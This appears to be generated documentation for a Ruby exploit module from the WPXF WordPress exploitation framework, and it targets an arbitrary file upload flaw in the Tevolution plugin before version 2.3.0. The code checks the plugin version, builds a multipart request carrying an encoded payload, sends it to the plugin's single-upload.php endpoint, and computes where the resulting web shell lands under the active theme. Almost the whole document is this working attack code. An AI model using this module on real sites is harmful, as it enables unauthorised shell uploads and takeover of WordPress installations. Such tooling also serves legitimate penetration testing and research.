class Wpxf::Exploit::TevolutionShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/tevolution_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: 'Tevolution < 2.3.0 Shell Upload',
    author: [
      'rastating'  # WPXF module
    ],
    references: [
      ['WPVDB', '8482'],
      ['URL', 'https://templatic.com/news/security-vulnerability-found-themes/']
    ],
    date: 'Apr 23 2016'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/shell/tevolution_shell_upload.rb, line 22
def check
  change_log = normalize_uri(plugin_url, 'change_log.txt')
  check_version_from_custom_file(change_log, /\(Version\s(\d\.\d\.\d)\)/, '2.3.0')
end
payload_body_builder() click to toggle source
# File lib/wpxf/modules/exploit/shell/tevolution_shell_upload.rb, line 35
def payload_body_builder
  builder = Utility::BodyBuilder.new
  builder.add_file_from_string(Utility::Text.rand_alpha(5), payload.encoded, payload_name)
  builder
end
plugin_url() click to toggle source
# File lib/wpxf/modules/exploit/shell/tevolution_shell_upload.rb, line 27
def plugin_url
  normalize_uri(wordpress_url_plugins, 'Tevolution')
end
scrape_current_theme() click to toggle source
# File lib/wpxf/modules/exploit/shell/tevolution_shell_upload.rb, line 41
def scrape_current_theme
  res = execute_get_request(url: full_uri)
  res.body[/\/#{wp_content_dir}\/themes\/(.*?)\//, 1] if res && res.body
end
uploaded_payload_location() click to toggle source
# File lib/wpxf/modules/exploit/shell/tevolution_shell_upload.rb, line 46
def uploaded_payload_location
  theme = scrape_current_theme
  normalize_uri(wordpress_url_themes, theme, 'images', 'tmp', payload_name)
end
uploader_url() click to toggle source
# File lib/wpxf/modules/exploit/shell/tevolution_shell_upload.rb, line 31
def uploader_url
  normalize_uri(plugin_url, 'tmplconnector', 'monetize', 'templatic-custom_fields', 'single-upload.php')
end